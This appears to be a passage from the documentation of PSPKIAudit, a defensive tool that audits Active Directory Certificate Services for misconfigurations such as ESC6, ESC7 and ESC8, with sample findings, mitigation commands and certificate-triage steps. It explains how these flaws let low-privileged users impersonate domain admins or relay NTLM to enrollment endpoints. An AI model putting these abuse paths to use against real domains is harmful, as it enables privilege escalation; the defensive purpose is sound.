GenericAll CN=DC,CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL
GenericAll CN=THESHIRE-DC-CA,CN=DC,CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL

THESHIRE\DC$ (S-1-5-21-3022474190-4230777124-3051344698-1000)
WriteOwner CN=THESHIRE-DC-CA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL
GenericAll CN=THESHIRE-DC-CA,CN=AIA,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL
GenericAll CN=THESHIRE-DC-CA,CN=DC,CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL
GenericAll CN=THESHIRE-DC-CA,CN=KRA,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL

THESHIRE\Domain Computers (S-1-5-21-3022474190-4230777124-3051344698-515)
WriteDacl CN=MisconfiguredTemplate,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL

THESHIRE\Domain Users (S-1-5-21-3022474190-4230777124-3051344698-513)
WriteAllProperties CN=MisconfiguredTemplate,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL

THESHIRE\john-sa (S-1-5-21-3022474190-4230777124-3051344698-1602)
GenericAll CN=MisconfiguredTemplate,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL

NT AUTHORITY\Authenticated Users (S-1-5-11)
Owner CN=MisconfiguredTemplate,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL
WriteOwner CN=MisconfiguredTemplate,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=THESHIRE,DC=LOCAL

Mitigations

Remove any vulnerable access control entries through Active Directory Users and Computers (dsa.msc) or ADSIEdit (adsiedit.msc) for configuration objects.


ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2

Details

If the EDITF_ATTRIBUTESUBJECTALTNAME2 flag is flipped in the configuration for a Certificate Authority, ANY certificate request can specify arbitrary Subject Alternative Names (SANs). This means that ANY template configured for domain authentication that also allows unprivileged users to enroll (e.g., the default User template) can be abused to obtain a certificate that allows us to authenticate as a domain admin (or any other active user/machine).

THIS SETTING SHOULD ABSOLUTELY NOT BE SET IN YOUR ENVIRONMENT.


Example
=== Certificate Authority ===


ComputerName : dc.theshire.local
CAName : theshire-DC-CA
ConfigString : dc.theshire.local\theshire-DC-CA
IsRoot : True
AllowsUserSuppliedSans : True
VulnerableACL : False
EnrollmentPrincipals : THESHIRE\Domain Users
THESHIRE\Domain Computers
THESHIRE\certmanager
THESHIRE\certadmin
THESHIRE\Nested3
EnrollmentEndpoints :
NTLMEnrollmentEndpoints :
DACL : BUILTIN\Administrators (Allow) - ManageCA, ManageCertificates
THESHIRE\Domain Admins (Allow) - ManageCA, ManageCertificates
THESHIRE\Domain Users (Allow) - Read, Enroll
THESHIRE\Domain Computers (Allow) - Enroll
THESHIRE\Enterprise Admins (Allow) - ManageCA, ManageCertificates
THESHIRE\certmanager (Allow) - ManageCertificates, Enroll
THESHIRE\certadmin (Allow) - ManageCA, Enroll
THESHIRE\Nested3 (Allow) - ManageCertificates, Enroll
Misconfigurations : ESC6

[!] The above CA is misconfigured!

...(snip)...

[!] EDITF_ATTRIBUTESUBJECTALTNAME2 set on this CA, the following templates may be vulnerable:

CA : dc.theshire.local\theshire-DC-CA
Name : User
SchemaVersion : 1
OID : 1.3.6.1.4.1.311.21.8.10395027.10224472.4213181.15714845.1171465.9.1.1
VulnerableTemplateACL : False
LowPrivCanEnroll : True
EnrolleeSuppliesSubject : False
EnhancedKeyUsage : Encrypting File System (1.3.6.1.4.1.311.10.3.4)|Secure Email (1.3.6.1.5.5.7.3.4)|Client Authentication (1.3.6.1.5.5.7.3.2)
HasAuthenticationEku : True
HasDangerousEku : False
EnrollmentAgentTemplate : False
CAManagerApproval : False
IssuanceRequirements : [Issuance Requirements]
Authorized signature count: 0
Reenrollment requires: same criteria as for enrollment.
ValidityPeriod : 1 years
RenewalPeriod : 6 weeks
Owner : THESHIRE\Enterprise Admins
DACL : NT AUTHORITY\Authenticated Users (Allow) - Read
THESHIRE\Domain Admins (Allow) - Read, Write, Enroll
THESHIRE\Domain Users (Allow) - Read, Enroll
THESHIRE\Enterprise Admins (Allow) - Read, Write, Enroll
Misconfigurations :


Mitigations

Immediately remove this flag and restart the affected certificate authority. From a PowerShell prompt with elevated rights against the CA server:

PS C:\> certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2

PS C:\> Get-Service -ComputerName CA_HOST certsvc | Restart-Service -Force
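
The leading minus sign on -EDITF_ATTRIBUTESUBJECTALTNAME2 tells certutil to clear that bit rather than set it, and the service restart is required for the change to take effect. Re-running the -getreg check shown above afterwards confirms the flag is gone.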

ESC7 - Vulnerable Certificate Authority Access Control

Details

Outside of certificate templates, a certificate authority itself has a set of permissions that secure various CA actions. These permissions can be accessed from certsrv.msc by right-clicking a CA, selecting Properties, and switching to the Security tab.

There are two security-sensitive rights that are dangerous if unintended principals possess them:

  • ManageCA (aka "CA Administrator") - allows for administrative CA actions, including (remotely) flipping the EDITF_ATTRIBUTESUBJECTALTNAME2 bit, resulting in ESC6.
  • ManageCertificates (aka "Certificate Manager/Officer") - allows the principal to approve pending certificate requests, negating the "Manager Approval" issuance requirement/protection.
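
Which principals actually hold these rights can also be enumerated without the GUI. Below is a minimal sketch using PSPKI's Get-CertificationAuthorityAcl cmdlet (verify the cmdlet name against your installed PSPKI version); look through the returned entries for ManageCA/ManageCertificates grants:

PS C:\> Get-CertificationAuthority -ComputerName dc.theshire.local | Get-CertificationAuthorityAcl | Format-List *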

Example
=== Certificate Authority ===


ComputerName : dc.theshire.local
CAName : theshire-DC-CA
ConfigString : dc.theshire.local\theshire-DC-CA
IsRoot : True
AllowsUserSuppliedSans : False
VulnerableACL : True
EnrollmentPrincipals : THESHIRE\Domain Users
THESHIRE\Domain Computers
THESHIRE\certmanager
THESHIRE\certadmin
THESHIRE\Nested3
EnrollmentEndpoints :
NTLMEnrollmentEndpoints :
DACL : BUILTIN\Administrators (Allow) - ManageCA, ManageCertificates
THESHIRE\Domain Admins (Allow) - ManageCA, ManageCertificates
THESHIRE\Domain Users (Allow) - ManageCA, Read, Enroll
THESHIRE\Domain Computers (Allow) - Enroll
THESHIRE\Enterprise Admins (Allow) - ManageCA, ManageCertificates
THESHIRE\certmanager (Allow) - ManageCertificates, Enroll
THESHIRE\certadmin (Allow) - ManageCA, Enroll
THESHIRE\Nested3 (Allow) - ManageCertificates, Enroll
Misconfigurations : ESC7

[!] The above CA is misconfigured!

Mitigations

Open up the Certification Authority console (certsrv.msc) on the affected CA, right-click the CA name and click "Properties".

Go to "Security" and remove the vulnerable access control entry.


ESC8 - NTLM Relay to AD CS HTTP Endpoints

NOTE: this particular check in PSPKIAudit only checks if NTLM is present for any published enrollment endpoints. It does NOT check if Extended Protection for Authentication is enabled on these NTLM-enabled endpoints, so false positives may occur!


Details

AD CS supports several HTTP-based enrollment methods via additional AD CS server roles that administrators can install. These HTTP-based certificate enrollment interfaces are all vulnerable to NTLM relay attacks.

Using NTLM relay, an attacker on a compromised machine can impersonate any inbound-NTLM-authenticating AD account. While impersonating the victim account, an attacker could access these web interfaces and request a client authentication certificate based on the User or Machine certificate templates.
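
A quick way to see whether an enrollment endpoint offers NTLM is to request it anonymously and inspect the WWW-Authenticate headers on the 401 response. A minimal sketch follows (the URL is the example endpoint below; Windows PowerShell throws on the 401, so the headers are read from the exception). As with the PSPKIAudit check, this only shows that NTLM is offered, not whether Extended Protection is enforced:

try {
    Invoke-WebRequest -Uri "http://dc.theshire.local/certsrv/" -UseBasicParsing
} catch {
    # "NTLM" (or "Negotiate") here means the endpoint accepts NTLM authentication
    $_.Exception.Response.Headers.GetValues("WWW-Authenticate")
}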


Example
=== Certificate Authority ===


ComputerName : dc.theshire.local
CAName : theshire-DC-CA
ConfigString : dc.theshire.local\theshire-DC-CA
IsRoot : True
AllowsUserSuppliedSans : False
VulnerableACL : False
EnrollmentPrincipals : THESHIRE\Domain Users
THESHIRE\Domain Computers
THESHIRE\certmanager
THESHIRE\certadmin
THESHIRE\Nested3
EnrollmentEndpoints : http://dc.theshire.local/certsrv/
NTLMEnrollmentEndpoints : http://dc.theshire.local/certsrv/
DACL : BUILTIN\Administrators (Allow) - ManageCA, ManageCertificates
THESHIRE\Domain Admins (Allow) - ManageCA, ManageCertificates
THESHIRE\Domain Users (Allow) - Read, Enroll
THESHIRE\Domain Computers (Allow) - Enroll
THESHIRE\Enterprise Admins (Allow) - ManageCA, ManageCertificates
THESHIRE\certmanager (Allow) - ManageCertificates, Enroll
THESHIRE\certadmin (Allow) - ManageCA, Enroll
THESHIRE\Nested3 (Allow) - ManageCertificates, Enroll
Misconfigurations : ESC8

[!] The above CA is misconfigured!

Mitigations

Either remove the HTTP(S) enrollment endpoints, disable NTLM for those endpoints, or enable Extended Protection for Authentication. See Harden AD CS HTTP Endpoints - PREVENT8 in the whitepaper for more details.
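
If the endpoints must remain, Extended Protection for Authentication can be enabled on the IIS application hosting them. Below is a sketch using the WebAdministration module and the default "Default Web Site/CertSrv" location; the configuration path follows Microsoft's AD CS hardening guidance, but verify it matches your environment:

Import-Module WebAdministration
# Require channel-binding token checking for Windows authentication on /certsrv
Set-WebConfigurationProperty -Location "Default Web Site/CertSrv" `
    -Filter "system.webServer/security/authentication/windowsAuthentication" `
    -Name "extendedProtection.tokenChecking" -Value "Require"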


Misc - Explicit Mappings

Another possible mitigation for some situations is to enforce explicit mappings for certificates. This disables the use of alternate SANs in certificates when authenticating to Active Directory.

For Kerberos, setting the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc!UseSubjectAltName value to 00000000 forces an explicit mapping. There are more details in KB4043463.

Enforcing explicit mappings for SChannel is not really documented, but based on our research, setting the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL!CertificateMappingMethods value to 0x1 or 0x2 appears to block SANs; however, more testing is needed.
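
Both values can be set with standard registry cmdlets. A sketch follows (the Kerberos value is per KB4043463; the SChannel value carries the testing caveat above, and both changes affect all certificate-based authentication, so stage them carefully):

# Kerberos (KDC): require an explicit mapping instead of trusting the SAN
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Kdc" `
    -Name UseSubjectAltName -Value 0 -Type DWord

# SChannel: restrict certificate mapping methods (see caveat above)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL" `
    -Name CertificateMappingMethods -Value 0x1 -Type DWord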


Triaging Existing Issued Certificate Requests

WARNING: this functionality has been minimally tested in large environments!

Note: see "Monitor User/Machine Certificate Enrollments - DETECT1" in the whitepaper for additional information and how to perform these searches with certutil.

If you want to examine existing issued certificate requests, for example to see if any requests specified arbitrary SANs or were requested for specific templates/by specific principals, the Get-CertRequest [-CAComputerName COMPUTER.DOMAIN.COM | -CAName X-Y-Z] function builds on various PSPKI functions to provide more contextual information.

Specifically, the raw Certificate Signing Request (CSR) is extracted for every currently issued certificate in the domain, and specific information (i.e., whether a SAN was specified, the requestor name/machine/process, etc.) is constructed from the request to enrich the CSR object.

The following flags can be useful:

Flag                      Description
-HasSAN                   Only return issued certificates that have a Subject Alternative Name specified in the request.
-Requester DOMAIN\USER    Only return issued certificate requests from the specified requesting user.
-Template TEMPLATE_NAME   Only return issued certificate requests for the specified template name.

To export ALL issued certificate requests to CSV, use Get-CertRequest | Export-CSV -NoTypeInformation requests.csv.
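
For example, combining the documented flags (the CA, principal, and template names are illustrative, taken from the sample output below):

PS C:\> Get-CertRequest -CAName theshire-DC-CA -HasSAN
PS C:\> Get-CertRequest -CAName theshire-DC-CA -Requester "THESHIRE\cody" -Template "ESC1 Template"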

Here is an example result entry that shows a situation where a Subject Alternative Name (SAN) was specified with Certify:

CA : dc.theshire.local\theshire-DC-CA
RequestID : 4602
RequesterName : THESHIRE\cody
RequesterMachineName : dev.theshire.local
RequesterProcessName : Certify.exe
SubjectAltNamesExtension :
SubjectAltNamesAttrib : Administrator
SerialNumber : 55000011faef0fab5ffd7f75b30000000011fa
CertificateTemplate : ESC1 Template
(1.3.6.1.4.1.311.21.8.10395027.10224472.4213181.15714845.1171465.9.10657968.9897558)
RequestDate : 6/3/2021 5:54:51 PM
StartDate : 6/3/2021 5:44:51 PM
EndDate : 6/3/2022 5:44:51 PM

CA : dc.theshire.local\theshire-DC-CA
RequestID : 4603
RequesterName : THESHIRE\cody
RequesterMachineName : dev.theshire.local
RequesterProcessName : Certify.exe
SubjectAltNamesExtension : Administrator
SubjectAltNamesAttrib :
SerialNumber : 55000011fb021b79cf7276c2de0000000011fb
CertificateTemplate : ESC1 Template
(1.3.6.1.4.1.311.21.8.10395027.10224472.4213181.15714845.1171465.9.10657968.9897558)
RequestDate : 6/3/2021 5:55:10 PM
StartDate : 6/3/2021 5:45:10 PM
EndDate : 6/3/2022 5:45:10 PM

The SubjectAltNamesExtension property means that the x509 SubjectAlternativeNames extension was used to specify the SAN, which happens for templates with the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag. The SubjectAltNamesAttrib property means that x509 name/value pairs were used, which happens when specifying a SAN when the EDITF_ATTRIBUTESUBJECTALTNAME2 CA flag is set.

Existing issued certificates can be revoked using PSPKI's Revoke-Certificate function:

PS C:\> Get-CertificationAuthority <CAName> | Get-IssuedRequest -RequestID <X> | Revoke-Certificate -Reason "KeyCompromise"

Applicable values for -Reason are "KeyCompromise", "CACompromise", and "Unspecified".
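
Revocation can also be driven by the triage results above. Below is a sketch that revokes every certificate issued from a known-bad template; the RequestID property matches the Get-CertRequest output shown earlier, but review the list before running, since revocation is disruptive:

$ca = Get-CertificationAuthority theshire-DC-CA
Get-CertRequest -CAName theshire-DC-CA -Template "ESC1 Template" |
    ForEach-Object { $ca | Get-IssuedRequest -RequestID $_.RequestID |
        Revoke-Certificate -Reason "KeyCompromise" }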



โŒ